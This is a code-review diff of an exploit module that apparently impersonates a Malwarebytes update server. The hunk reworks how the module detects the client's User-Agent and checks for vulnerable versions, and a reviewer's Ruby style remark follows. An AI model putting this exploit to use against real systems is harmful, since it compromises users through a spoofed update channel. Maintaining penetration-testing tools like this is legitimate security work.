modules/exploits/windows/browser/mbam_update_exec.rb

```diff
@@ -59,48 +68,49 @@ def on_request_uri(cli, request)
     uri = request.uri
 
     newvers = {
-      'mbam' => '2.0.3.1025',
+      'mbam' => '2.0.3.1025', # Legit fixed versions
       'mbae' => '1.04.1.1012'
     }
 
-    unless agent = ua ? ua[/^(\w{4})/, 1] : uri[/^\/v2\/(\w{4})/, 1]
-      print_error("User agent cannot be identified")
+    agent = ua ? ua[/^(\w{4})/, 1] : uri[/^\/v2\/(\w{4})/, 1]
+
+    if agent
+      vprint_status "User-Agent '#{agent.upcase}' detected."
+    else
+      print_error("User agent cannot be identified, trying anyway.")
       send_response(cli, '')
       return
     end
 
     unless agent =~ /^mba(m|e)/
-      print_error("Unknown user agent connected")
-      send_response(cli, '')
+      print_error("Unknown user agent connected, aborting.")
       return
     end
 
     case uri
     when "/v2/#{agent}/consumer/version.chk"
-      print_status("#{agent.upcase} connected")
-
       unless ua
-        print_status("Client may not be vulnerable")
+        print_status("Client User-Agent '#{ua}' isn't vulnerable, aborting.")
+        return
       end
-
-      if ua && (ver = ua[/base:(\d+\.\d+\.\d+\.\d+)/,1]) &&
-         Gem::Version.new(ver) >= Gem::Version.new('2.0.3')
-        print_error("Client version #{ver} is not vulnerable")
-        send_response(cli, '')
+      ver = ua[/base:(\d+\.\d+\.\d+\.\d+)/,1]
```

Comment:
`Don't use the return value of = (an assignment) in conditional expressions unless the assignment is wrapped in parentheses.`

It was wrapped in parentheses.